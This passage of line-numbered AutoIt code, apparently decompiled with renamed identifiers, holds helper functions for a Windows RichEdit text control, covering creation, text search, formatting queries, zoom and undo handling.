  3363. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  3364. RETURN Fn0006($Arg00,$Var053F , 0 , 0 )<> 0
  3365. ENDFUNC
  3366.  
  3367. Func Fn0114($Arg00,$Arg01)
  3368. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  3369. IF NOT Fn0176($Arg01)THEN SETERROR(0x0066 , 0 ,FALSE )
  3370. IF NOT Fn0147($Arg00)THEN RETURN SETERROR(- 1 , 0 ,FALSE )
  3371. RETURN Fn0006($Arg00,$Var025C ,$Arg01, 0 )<> 0
  3372. ENDFUNC
  3373.  
  3374. Func Fn0115($Arg00)
  3375. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  3376. Fn0006($Arg00,$Var0501 , 0 , 0 )
  3377. RETURN TRUE
  3378. ENDFUNC
  3379.  
  3380. Func Fn0116($Arg00,$Arg01,$Arg02,$Arg03,$ArgOpt04=150,$ArgOpt05=150,$ArgOpt06=-1,$ArgOpt07=-1)
  3381. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR( 1 , 0 , 0 )
  3382. IF NOT ISSTRING($Arg01)THEN RETURN SETERROR( 2 , 0 , 0 )
  3383. IF NOT Fn0176($Arg02,">=0" )THEN RETURN SETERROR(0x0067 , 0 , 0 )
  3384. IF NOT Fn0176($Arg03,">=0" )THEN RETURN SETERROR(0x0068 , 0 , 0 )
  3385. IF NOT Fn0176($ArgOpt04,">0,-1" )THEN RETURN SETERROR(0x0069 , 0 , 0 )
  3386. IF NOT Fn0176($ArgOpt05,">0,-1" )THEN RETURN SETERROR(0x006A , 0 , 0 )
  3387. IF NOT Fn0176($ArgOpt06,">=0,-1" )THEN RETURN SETERROR(0x006B , 0 , 0 )
  3388. IF NOT Fn0176($ArgOpt07,">=0,-1" )THEN RETURN SETERROR(0x006C , 0 , 0 )
  3389. IF $ArgOpt04=- 1 THEN $ArgOpt04=0x0096
  3390. IF $ArgOpt05=- 1 THEN $ArgOpt05=0x0096
  3391. IF $ArgOpt06=- 1 THEN $ArgOpt06=BITOR($Var0540 ,$Var0541 )
  3392. IF BITAND($ArgOpt06,$Var0541 )<> 0 THEN $ArgOpt06=BITOR($ArgOpt06,$Var0540 )
  3393. IF $ArgOpt07=- 1 THEN $ArgOpt07=0x0200
  3394. $ArgOpt06=BITOR($ArgOpt06,$Var0505 ,$Var0503 )
  3395. IF BITAND($ArgOpt06,$Var0542 )= 0 THEN $ArgOpt06=BITOR($ArgOpt06,$Var0507 )
  3396. LOCAL $Local0097 =Fn010A($Arg00)
  3397. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  3398. Fn0170()
  3399. LOCAL $Local0098 =Fn0020($ArgOpt07,$Var04B6 ,"",$ArgOpt06,$Arg02,$Arg03,$ArgOpt04,$ArgOpt05,$Arg00,$Local0097 )
  3400. IF $Local0098 = 0 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
  3401. Fn017C($Local0098 )
  3402. Fn0006($Local0098 ,$Var0509 ,Fn0065($Var0082 ),TRUE )
  3403. Fn010E($Local0098 ,$Arg01)
  3404. RETURN $Local0098
  3405. ENDFUNC
  3406.  
  3407. Func Fn0117($Arg00)
  3408. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  3409. Fn0006($Arg00,$Var050B , 0 , 0 )
  3410. RETURN TRUE
  3411. ENDFUNC
  3412.  
  3413. Func Fn0118($Arg00)
  3414. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  3415. Fn0006($Arg00,$Var0543 ,- 1 , 0 )
  3416. RETURN TRUE
  3417. ENDFUNC
  3418.  
  3419. Func Fn0119(BYREF $ArgRef00)
  3420. IF $Var04B5 THEN Fn010D($ArgRef00,$Var04B6 )
  3421. IF NOT Fn007D($ArgRef00,$Var04B6 )THEN RETURN SETERROR( 2 , 2 ,FALSE )
  3422. LOCAL $Local0099 = 0
  3423. IF ISHWND($ArgRef00)THEN
  3424. IF Fn007B($ArgRef00,$Var04CB )THEN
  3425. LOCAL $Local0097 =Fn0052($ArgRef00)
  3426. LOCAL $Local009A =Fn0062($ArgRef00)
  3427. $Local0099 =Fn0025($ArgRef00)
  3428. LOCAL $Local0055 =Fn010B($Local009A ,$Local0097 )
  3429. IF NOT $Local0055 THEN
  3430. ENDIF
  3431. ELSE
  3432. RETURN SETERROR( 1 , 1 ,FALSE )
  3433. ENDIF
  3434. ELSE
  3435. $Local0099 =GUICTRLDELETE($ArgRef00)
  3436. ENDIF
  3437. IF $Local0099 THEN $ArgRef00= 0
  3438. RETURN $Local0099 <> 0
  3439. ENDFUNC
  3440.  
  3441. Func Fn011A($Arg00)
  3442. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  3443. Fn0006($Arg00,$Var0544 , 0 , 0 )
  3444. RETURN TRUE
  3445. ENDFUNC
  3446.  
  3447. Func Fn011B($Arg00,$Arg01,$ArgOpt02=TRUE ,$ArgOpt03=FALSE ,$ArgOpt04=FALSE ,$ArgOpt05=0)
  3448. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,- 1 )
  3449. IF $Arg01="" THEN RETURN SETERROR(0x0066 , 0 ,- 1 )
  3450. IF NOT ISBOOL($ArgOpt02)THEN RETURN SETERROR(0x0067 , 0 ,- 1 )
  3451. IF NOT ISBOOL($ArgOpt03)THEN RETURN SETERROR(0x0068 , 0 ,- 1 )
  3452. IF NOT ISBOOL($ArgOpt04)THEN RETURN SETERROR(0x0069 , 0 ,- 1 )
  3453. IF NOT Fn0176($ArgOpt05)THEN RETURN SETERROR(0x0425 , 0 ,- 1 )
  3454. IF BITAND($ArgOpt05,BITNOT(BITOR($Var0357 ,$Var035B ,$Var035D )))<> 0 THEN RETURN SETERROR(0x0426 , 0 ,- 1 )
  3455. LOCAL $Local009B =STRINGLEN($Arg01)+ 3
  3456. LOCAL $Local009C =DLLSTRUCTCREATE("wchar[" &$Local009B &"]" )
  3457. DLLSTRUCTSETDATA($Local009C , 1 ,$Arg01)
  3458. LOCAL $Local009D =DLLSTRUCTCREATE($Var0525 )
  3459. LOCAL $Var0545
  3460. LOCAL $Local009E =Fn0147($Arg00)
  3461. IF $Local009E THEN
  3462. $Var0545 =Fn013C($Arg00)
  3463. ELSE
  3464. $Var0545 =Fn013B($Arg00)
  3465. ENDIF
  3466. DLLSTRUCTSETDATA($Local009D , 1 ,$Var0545 [ 0 ])
  3467. DLLSTRUCTSETDATA($Local009D , 2 ,Fn0102($ArgOpt02,- 1 , 0 ))
  3468. DLLSTRUCTSETDATA($Local009D , 3 ,DLLSTRUCTGETPTR($Local009C ))
  3469. LOCAL $Local009F = 0
  3470. IF $ArgOpt02 THEN $Local009F =$Var0355
  3471. IF $ArgOpt04 THEN $Local009F =BITOR($Local009F ,$Var0361 )
  3472. IF $ArgOpt03 THEN $Local009F =BITOR($Local009F ,$Var0359 )
  3473. $Local009F =BITOR($Local009F ,$ArgOpt05)
  3474. RETURN Fn0006($Arg00,$Var020E ,$Local009F ,$Local009D ,"wparam" ,"ptr" ,"struct*" )
  3475. ENDFUNC
  3476.  
  3477. Func Fn011C($Arg00,$Arg01,$ArgOpt02=0,$ArgOpt03=-1,$ArgOpt04=FALSE ,$ArgOpt05=FALSE ,$ArgOpt06=0)
  3478. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  3479. IF $Arg01="" THEN RETURN SETERROR(0x0066 , 0 , 0 )
  3480. IF NOT Fn0176($ArgOpt02,">=0,-1" )THEN RETURN SETERROR(0x0067 , 0 , 0 )
  3481. IF NOT Fn0176($ArgOpt03,">=0,-1" )THEN RETURN SETERROR(0x0068 , 0 , 0 )
  3482. IF NOT ISBOOL($ArgOpt04)THEN RETURN SETERROR(0x0069 , 0 , 0 )
  3483. IF NOT ISBOOL($ArgOpt05)THEN RETURN SETERROR(0x006A , 0 , 0 )
  3484. IF NOT Fn0176($ArgOpt06)THEN RETURN SETERROR(0x042F , 0 , 0 )
  3485. IF BITAND($ArgOpt06,BITNOT(BITOR($Var0357 ,$Var035B ,$Var035D )))<> 0 THEN RETURN SETERROR(0x0430 , 0 , 0 )
  3486. LOCAL $Local009B =STRINGLEN($Arg01)+ 3
  3487. LOCAL $Local009C =DLLSTRUCTCREATE("wchar Text["&$Local009B &"]" )
  3488. DLLSTRUCTSETDATA($Local009C ,"Text" ,$Arg01)
  3489. LOCAL $Local009D =DLLSTRUCTCREATE($Var0527 )
  3490. DLLSTRUCTSETDATA($Local009D ,"cpMin" ,$ArgOpt02)
  3491. DLLSTRUCTSETDATA($Local009D ,"cpMax" ,$ArgOpt03)
  3492. DLLSTRUCTSETDATA($Local009D ,"lpstrText" ,DLLSTRUCTGETPTR($Local009C ))
  3493. LOCAL $Local009F = 0
  3494. IF $ArgOpt03>=$ArgOpt02 OR $ArgOpt03=- 1 THEN
  3495. $Local009F =$Var0355
  3496. ENDIF
  3497. IF $ArgOpt05 THEN $Local009F =BITOR($Local009F ,$Var0361 )
  3498. IF $ArgOpt04 THEN $Local009F =BITOR($Local009F ,$Var0359 )
  3499. $Local009F =BITOR($Local009F ,$ArgOpt06)
  3500. Fn0006($Arg00,$Var020C ,$Local009F ,$Local009D ,"iWparam" ,"ptr" ,"struct*" )
  3501. LOCAL $Local008E [ 2 ]
  3502. $Local008E [ 0 ]=DLLSTRUCTGETDATA($Local009D ,"cpMinRang" )
  3503. $Local008E [ 1 ]=DLLSTRUCTGETDATA($Local009D ,"cpMaxRange")
  3504. RETURN $Local008E
  3505. ENDFUNC
  3506.  
  3507. Func Fn011D($Arg00)
  3508. LOCAL CONST $Local00C2 [0x0011 ][ 3 ]=[["bo" ,$Var030E ,$Var0347 ],["di" ,$Var0314 ,$Var0348 ],["em" ,$Var0316 ,$Var0349 ],["hi" ,$Var031A ,$Var034A ],["im" ,$Var031C ,$Var034B ],["it" ,$Var031E ,$Var034C ],["li" ,$Var0324 ,$Var034D ],["ou" ,$Var0328 ,$Var034E ],["pr" ,$Var032A ,$Var034F ],["re" ,$Var032E ,$Var0350 ],["sh" ,$Var0330 ,$Var0351 ],["sm" ,$Var0334 ,$Var0352 ],["st" ,$Var0338 ,$Var0353 ],["sb" ,$Var033C ,$Var0304 ],["sp" ,$Var033D ,$Var0306 ],["un" ,$Var033E ,$Var0354 ],["al" ,$Var0308 ,$Var0344 ]]
  3509. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
  3510. LOCAL $Local009E =Fn0147($Arg00)
  3511. IF NOT $Local009E THEN RETURN SETERROR(- 1 , 0 ,"")
  3512. LOCAL $Local00A0 =DLLSTRUCTCREATE($Var0520 )
  3513. DLLSTRUCTSETDATA($Local00A0 , 1 ,DLLSTRUCTGETSIZE($Local00A0 ))
  3514. LOCAL $Local00A1 =Fn0006($Arg00,$Var0218 ,$Var0380 ,$Local00A0 , 0 ,"wparam" ,"struct*" )
  3515. LOCAL $Local00A2 =DLLSTRUCTGETDATA($Local00A0 , 3 )
  3516. LOCAL $Local00A3 ="",$Var0546 ,$Var0547 ,$Var0548
  3517. FOR $Local00EB = 0 TO UBOUND($Local00C2 , 1 )- 1
  3518. $Var0547 =BITAND($Local00A1 ,$Local00C2 [$Local00EB ][ 1 ])=$Local00C2 [$Local00EB ][ 1 ]
  3519. $Var0548 =BITAND($Local00A2 ,$Local00C2 [$Local00EB ][ 2 ])=$Local00C2 [$Local00EB ][ 2 ]
  3520. IF $Local009E THEN
  3521. IF $Var0547 THEN
  3522. IF $Var0548 THEN
  3523. $Var0546 ="+"
  3524. ELSE
  3525. $Var0546 ="-"
  3526. ENDIF
  3527. ELSE
  3528. $Var0546 ="~"
  3529. ENDIF
  3530. ELSE
  3531. IF $Var0547 THEN
  3532. $Var0546 ="+"
  3533. ELSE
  3534. $Var0546 ="-"
  3535. ENDIF
  3536. ENDIF
  3537. IF $Var0546 <>"-" THEN $Local00A3 &=$Local00C2 [$Local00EB ][ 0 ]&$Var0546
  3538. NEXT
  3539. RETURN $Local00A3
  3540. ENDFUNC
  3541.  
  3542. Func Fn011E($Arg00)
  3543. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  3544. LOCAL $Local00A0 =DLLSTRUCTCREATE($Var0520 )
  3545. DLLSTRUCTSETDATA($Local00A0 , 1 ,DLLSTRUCTGETSIZE($Local00A0 ))
  3546. Fn017A($Arg00,$Local00A0 )
  3547. LOCAL $Local00A2 =DLLSTRUCTGETDATA($Local00A0 , 3 )
  3548. LOCAL $Local00A8
  3549. IF BITAND($Local00A2 ,$Var0345 )=$Var0345 THEN
  3550. $Local00A8 =Fn0067($Var0511 )
  3551. ELSE
  3552. $Local00A8 =DLLSTRUCTGETDATA($Local00A0 ,0x000C )
  3553. ENDIF
  3554. RETURN SETEXTENDED(BITAND($Local00A2 ,$Var030C )<> 0 ,$Local00A8 )
  3555. ENDFUNC
  3556.  
  3557. Func Fn011F($Arg00)
  3558. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  3559. LOCAL $Local00A0 =DLLSTRUCTCREATE($Var051D )
  3560. DLLSTRUCTSETDATA($Local00A0 , 1 ,DLLSTRUCTGETSIZE($Local00A0 ))
  3561. Fn017A($Arg00,$Local00A0 )
  3562. LOCAL $Local00A2 =DLLSTRUCTGETDATA($Local00A0 , 3 )
  3563. LOCAL $Local00DC
  3564. IF BITAND($Local00A2 ,$Var0346 )=$Var0346 THEN
  3565. $Local00DC =Fn0067($Var0511 )
  3566. ELSE
  3567. $Local00DC =DLLSTRUCTGETDATA($Local00A0 , 6 )
  3568. ENDIF
  3569. RETURN SETEXTENDED(BITAND($Local00A2 ,$Var0312 )<> 0 ,$Local00DC )
  3570. ENDFUNC
  3571.  
  3572. Func Fn0120($Arg00,$Arg01,$Arg02)
  3573. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  3574. IF NOT Fn0176($Arg01)THEN RETURN SETERROR(0x0066 , 0 , 0 )
  3575. IF NOT Fn0176($Arg02)THEN RETURN SETERROR(0x0067 , 0 , 0 )
  3576. LOCAL $Local00A4 =Fn012A($Arg00)
  3577. IF $Arg01<$Local00A4 [ 0 ]OR $Arg01>$Local00A4 [ 2 ]OR $Arg02<$Local00A4 [ 1 ]OR $Arg02>$Local00A4 [ 3 ]THEN RETURN - 1
  3578. LOCAL $Local00A5 =DLLSTRUCTCREATE("LONG x; LONG y;")
  3579. DLLSTRUCTSETDATA($Local00A5 , 1 ,$Arg01)
  3580. DLLSTRUCTSETDATA($Local00A5 , 2 ,$Arg02)
  3581. LOCAL $Local0055 =Fn0006($Arg00,$Var0549 , 0 ,$Local00A5 , 0 ,"wparam" ,"struct*" )
  3582. IF NOT $Local0055 THEN RETURN SETERROR(- 1 , 0 , 0 )
  3583. RETURN $Local0055
  3584. ENDFUNC
  3585.  
  3586. Func Fn0121($Arg00,$Arg01)
  3587. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  3588. IF NOT Fn0176($Arg01)THEN RETURN SETERROR(0x0066 , 0 , 0 )
  3589. RETURN Fn0006($Arg00,$Var0210 ,$Var03EA ,$Arg01)
  3590. ENDFUNC
  3591.  
  3592. Func Fn0122($Arg00,$Arg01)
  3593. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  3594. IF NOT Fn0176($Arg01)THEN RETURN SETERROR(0x0066 , 0 , 0 )
  3595. RETURN Fn0006($Arg00,$Var0210 ,$Var03E4 ,$Arg01)
  3596. ENDFUNC
  3597.  
  3598. Func Fn0123($Arg00,$Arg01)
  3599. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
  3600. IF NOT Fn0176($Arg01)THEN RETURN SETERROR(0x0066 , 0 ,"")
  3601. LOCAL $Local0055 =Fn0006($Arg00,$Var0210 ,$Var03DC ,$Arg01)
  3602. LOCAL $Local00A6 =BITAND($Local0055 ,0x00F0 )
  3603. LOCAL $Local00A7 =""
  3604. IF BITAND($Local00A6 ,$Var03F8 )THEN $Local00A7 &="c"
  3605. IF BITAND($Local00A6 ,$Var03F6 )THEN $Local00A7 &="d"
  3606. IF BITAND($Local00A6 ,$Var03F4 )THEN $Local00A7 &="w"
  3607. $Local00A7 &=";" &BITAND($Local0055 ,0x000F )
  3608. RETURN $Local00A7
  3609. ENDFUNC
  3610.  
  3611. Func Fn0124($Arg00)
  3612. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  3613. LOCAL $Local00A8 =Fn0006($Arg00,$Var0254 ,FALSE , 0 )
  3614. Fn0006($Arg00,$Var0254 ,FALSE ,$Local00A8 )
  3615. RETURN $Local00A8
  3616. ENDFUNC
  3617.  
  3618. Func Fn0125($Arg00,$ArgOpt01=FALSE ,$ArgOpt02=0,$ArgOpt03="")
  3619. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
  3620. IF NOT ISBOOL($ArgOpt01)THEN RETURN SETERROR(0x0066 , 0 ,"")
  3621. IF NOT Fn0176($ArgOpt02)THEN RETURN SETERROR(0x0067 , 0 ,"")
  3622. LOCAL $Local009B =Fn0126($Arg00,FALSE ,TRUE )+ 1
  3623. LOCAL $Local00A9 =""
  3624. IF $ArgOpt02=$Var0302 OR NOT $ArgOpt02 THEN $Local00A9 ="w"
  3625. LOCAL $Local009C =DLLSTRUCTCREATE($Local00A9 &"char[" &$Local009B &"]" )
  3626. LOCAL $Local00AA =DLLSTRUCTCREATE($Var0529 )
  3627. DLLSTRUCTSETDATA($Local00AA ,"cb" ,DLLSTRUCTGETSIZE($Local009C ))
  3628. LOCAL $Local00AB = 0
  3629. IF $ArgOpt01 THEN $Local00AB =$Var02E8
  3630. DLLSTRUCTSETDATA($Local00AA ,"flags" ,$Local00AB )
  3631. IF $ArgOpt02= 0 THEN $ArgOpt02=$Var0302
  3632. DLLSTRUCTSETDATA($Local00AA ,"codepage" ,$ArgOpt02)
  3633. LOCAL $Local00AC = 0 ,$Var054A = 0
  3634. IF $ArgOpt03<>"" THEN
  3635. LOCAL $Local00AD =DLLSTRUCTCREATE("char" )
  3636. $Var054A =DLLSTRUCTGETPTR($Local00AD , 1 )
  3637. DLLSTRUCTSETDATA($Local00AD , 1 ,$ArgOpt03)
  3638. LOCAL $Local00AE =DLLSTRUCTCREATE("bool" )
  3639. $Local00AC =DLLSTRUCTGETPTR($Local00AE , 1 )
  3640. ENDIF
  3641. DLLSTRUCTSETDATA($Local00AA ,"lpDefaultChar",$Var054A )
  3642. DLLSTRUCTSETDATA($Local00AA ,"lpbUsedDefChar",$Local00AC )
  3643. LOCAL $Local0055 =Fn0006($Arg00,$Var0234 ,$Local00AA ,$Local009C , 0 ,"struct*" ,"struct*" )
  3644. IF $Local0055 = 0 THEN RETURN SETERROR(0x02BC , 0 ,"")
  3645. IF $ArgOpt03<>"" THEN SETEXTENDED(DLLSTRUCTGETDATA($Local00AE , 1 )<> 0 )
  3646. RETURN DLLSTRUCTGETDATA($Local009C , 1 )
  3647. ENDFUNC
  3648.  
  3649. Func Fn0126($Arg00,$ArgOpt01=TRUE ,$ArgOpt02=FALSE )
  3650. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  3651. IF NOT ISBOOL($ArgOpt01)THEN RETURN SETERROR(0x0066 , 0 , 0 )
  3652. IF NOT ISBOOL($ArgOpt02)THEN RETURN SETERROR(0x0067 , 0 , 0 )
  3653. LOCAL $Local00AF =DLLSTRUCTCREATE($Var052B )
  3654. LOCAL $Local00AB =BITOR($Var02F4 ,Fn0102($ArgOpt01,$Var02F2 ,$Var02EA ))
  3655. $Local00AB =BITOR($Local00AB ,Fn0102($ArgOpt02,$Var02EC ,$Var02EE ))
  3656. DLLSTRUCTSETDATA($Local00AF , 1 ,$Local00AB )
  3657. DLLSTRUCTSETDATA($Local00AF , 2 ,Fn0102($ArgOpt02,$Var0300 ,$Var0302 ))
  3658. LOCAL $Local0055 =Fn0006($Arg00,$Var0236 ,$Local00AF , 0 , 0 ,"struct*" )
  3659. RETURN $Local0055
  3660. ENDFUNC
  3661.  
  3662. Func Fn0127($Arg00)
  3663. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  3664. LOCAL $Local00B0 = 0 ,$Var054B = 0
  3665. LOCAL $Local00B1 =Fn0006($Arg00,$Var0244 ,$Local00B0 ,$Var054B ,- 1 ,"int*" ,"int*" )
  3666. IF NOT $Local00B1 [ 0 ]THEN RETURN SETERROR(0x02BC , 0 , 0 )
  3667. LOCAL $Local0055
  3668. IF $Local00B1 [ 3 ]= 0 AND $Local00B1 [ 4 ]= 0 THEN
  3669. $Local0055 =0x0064
  3670. ELSE
  3671. $Local0055 =$Local00B1 [ 3 ]/$Local00B1 [ 4 ]*0x0064
  3672. ENDIF
  3673. RETURN STRINGFORMAT("%.2f" ,$Local0055 )
  3674. ENDFUNC
  3675.  
  3676. Func Fn0128($Arg00,$ArgOpt01=-1)
  3677. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  3678. IF NOT Fn0176($ArgOpt01,">0,-1" )THEN RETURN SETERROR(0x03FD , 0 , 0 )
  3679. IF $ArgOpt01<>- 1 THEN $ArgOpt01-= 1
  3680. LOCAL $Local0055 =Fn0006($Arg00,$Var054C ,$ArgOpt01)
  3681. IF $Local0055 =- 1 THEN RETURN SETERROR(0x03FE , 0 , 0 )
  3682. RETURN $Local0055
  3683. ENDFUNC
  3684.  
  3685. Func Fn0129($Arg00)
  3686. LOCAL $Local008E [ 3 ]=[ 0 , 0 ,""]
  3687. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  3688. LOCAL $Local00A0 =DLLSTRUCTCREATE($Var051D )
  3689. DLLSTRUCTSETDATA($Local00A0 ,"cbSize" ,DLLSTRUCTGETSIZE($Local00A0 ))
  3690. Fn017A($Arg00,$Local00A0 )
  3691. IF BITAND(DLLSTRUCTGETDATA($Local00A0 ,"dwMask" ),$Var0318 )=$Var0318 THEN $Local008E [ 1 ]=DLLSTRUCTGETDATA($Local00A0 ,"szFaceName")
  3692. IF BITAND(DLLSTRUCTGETDATA($Local00A0 ,"dwMask" ),$Var0332 )=$Var0332 THEN $Local008E [ 0 ]=DLLSTRUCTGETDATA($Local00A0 ,"yHeight" )/0x0014
  3693. IF BITAND(DLLSTRUCTGETDATA($Local00A0 ,"dwMask" ),$Var0310 )=$Var0310 THEN $Local008E [ 2 ]=DLLSTRUCTGETDATA($Local00A0 ,"bCharSet" )
  3694. RETURN $Local008E
  3695. ENDFUNC
  3696.  
  3697. Func Fn012A($Arg00)
  3698. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  3699. LOCAL $Local0017 =DLLSTRUCTCREATE($Var013C )
  3700. Fn0006($Arg00,$Var054D , 0 ,$Local0017 , 0 ,"wparam" ,"struct*" )
  3701. LOCAL $Local00A4 [ 4 ]
  3702. $Local00A4 [ 0 ]=DLLSTRUCTGETDATA($Local0017 ,"Left" )
  3703. $Local00A4 [ 1 ]=DLLSTRUCTGETDATA($Local0017 ,"Top" )
  3704. $Local00A4 [ 2 ]=DLLSTRUCTGETDATA($Local0017 ,"Right" )
  3705. $Local00A4 [ 3 ]=DLLSTRUCTGETDATA($Local0017 ,"Bottom" )
  3706. RETURN $Local00A4
  3707. ENDFUNC
  3708.  
  3709. Func Fn012B($Arg00)
  3710. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  3711. RETURN Fn0006($Arg00,$Var054E )
  3712. ENDFUNC
  3713.  
  3714. Func Fn012C($Arg00,$Arg01)
  3715. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  3716. IF NOT Fn0176($Arg01,">0,-1" )THEN RETURN SETERROR(0x0066 , 0 , 0 )
  3717. LOCAL $Local00B2 =Fn0128($Arg00,$Arg01)
  3718. LOCAL $Local0055 =Fn0006($Arg00,$Var054F ,$Local00B2 )
  3719. RETURN $Local0055
  3720. ENDFUNC
  3721.  
  3722. Func Fn012D($Arg00,$Arg01)
  3723. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  3724. IF NOT Fn0176($Arg01,">=0" )THEN RETURN SETERROR(0x0066 , 0 , 0 )
  3725. RETURN Fn0006($Arg00,$Var0204 , 0 ,$Arg01)+ 1
  3726. ENDFUNC
  3727.  
  3728. Func Fn012E($Arg00,$ArgOpt01=TRUE )
  3729. LOCAL CONST $Local00D5 [ 6 ]=["Unknown" ,"Typing" ,"Delete" ,"Drag and drop","Cut" ,"Paste" ]
  3730. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
  3731. IF NOT ISBOOL($ArgOpt01)THEN RETURN SETERROR(0x0066 , 0 ,"")
  3732. LOCAL $Local00B3 =Fn0006($Arg00,$Var022E , 0 , 0 )
  3733. IF $ArgOpt01 THEN
  3734. RETURN $Local00D5 [$Local00B3 ]
  3735. ELSE
  3736. RETURN $Local00B3
  3737. ENDIF
  3738. ENDFUNC
  3739.  
  3740. Func Fn012F($Arg00,$ArgOpt01=TRUE )
  3741. LOCAL CONST $Local00D5 [ 6 ]=["Unknown" ,"Typing" ,"Delete" ,"Drag and drop","Cut" ,"Paste" ]
  3742. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
  3743. IF NOT ISBOOL($ArgOpt01)THEN RETURN SETERROR(0x0066 , 0 ,"")
  3744. LOCAL $Local00B3 =Fn0006($Arg00,$Var023E , 0 , 0 )
  3745. IF $ArgOpt01 THEN
  3746. RETURN $Local00D5 [$Local00B3 ]
  3747. ELSE
  3748. RETURN $Local00B3
  3749. ENDIF
  3750. ENDFUNC
  3751.  
  3752. Func Fn0130($Arg00)
  3753. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  3754. RETURN Fn0006($Arg00,$Var0550 )+ 1
  3755. ENDFUNC
  3756.  
  3757. Func Fn0131($Arg00)
  3758. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
  3759. LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
  3760. DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
  3761. Fn017B($Arg00,$Local00B4 )
  3762. IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,"")
  3763. LOCAL $Local00A1 =DLLSTRUCTGETDATA($Local00B4 , 2 )
  3764. LOCAL $Local00B5 =DLLSTRUCTGETDATA($Local00B4 , 8 )
  3765. LOCAL $Local00A7 =""
  3766. SWITCH ($Local00B5 )
  3767. CASE $Var0390
  3768. $Local00A7 ="l"
  3769. CASE $Var0394
  3770. $Local00A7 ="c"
  3771. CASE $Var0392
  3772. $Local00A7 ="r"
  3773. CASE $Var0396
  3774. $Local00A7 ="j"
  3775. CASE $Var0398
  3776. $Local00A7 ="w"
  3777. ENDSWITCH
  3778. $Local00A7 &=";" &Fn0177($Arg00,$Local00A1 ,$Var039E )
  3779. RETURN $Local00A7
  3780. ENDFUNC
  3781.  
  3782. Func Fn0132($Arg00)
  3783. LOCAL ENUM $Var0551 = 0 ,$Var0552 ,$Var0553
  3784. LOCAL CONST $Local00C2 [ 9 ][ 3 ]=[["fpg" ,$Var03D0 ,FALSE ],["hyp" ,$Var03D6 ,TRUE ],["kpt" ,$Var03CC ,FALSE ],["kpn" ,$Var03CE ,FALSE ],["pwo" ,$Var03D4 ,FALSE ],["r2l" ,$Var03CA ,FALSE ],["row" ,$Var039A ,FALSE ],["sbs" ,$Var03D8 ,FALSE ],["sln" ,$Var03D2 ,FALSE ]]
  3785. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
  3786. LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
  3787. DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
  3788. Fn017B($Arg00,$Local00B4 )
  3789. IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,"")
  3790. LOCAL $Local00A2 =DLLSTRUCTGETDATA($Local00B4 ,"wEffects" )
  3791. LOCAL $Local00A3 ="",$Var0546
  3792. FOR $Local00EB = 0 TO UBOUND($Local00C2 , 1 )- 1
  3793. $Local00A3 &=$Local00C2 [$Local00EB ][$Var0551 ]
  3794. IF BITAND($Local00A2 ,$Local00C2 [$Local00EB ][$Var0552 ])=$Local00C2 [$Local00EB ][$Var0552 ]THEN
  3795. $Var0546 =Fn0102($Local00C2 [$Local00EB ][$Var0553 ],"-" ,"+" )
  3796. ELSE
  3797. $Var0546 =Fn0102($Local00C2 [$Local00EB ][$Var0553 ],"+" ,"-" )
  3798. ENDIF
  3799. $Local00A3 &=$Var0546 &";"
  3800. NEXT
